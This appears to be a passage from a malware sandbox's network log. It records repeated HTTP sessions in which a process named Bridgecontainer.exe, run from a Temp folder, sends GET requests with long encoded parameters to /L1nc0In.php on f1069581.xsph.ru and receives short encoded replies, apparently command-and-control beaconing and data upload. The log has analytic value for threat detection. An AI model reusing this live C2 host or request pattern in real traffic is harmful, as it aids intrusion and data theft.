Jan 2, 2025 05:19:01.070681095 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50000	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:06.090580940 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:06.764190912 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50001	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:11.782843113 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:12.467449903 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50002	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:17.482655048 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:18.167092085 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50003	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:23.188725948 CET	2230	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:23.864540100 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50004	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:28.876593113 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:19:29.556889057 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50005	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:34.575462103 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:35.258728027 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50006	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:40.278254986 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:40.994932890 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50007	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:46.020806074 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:46.698717117 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50008	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
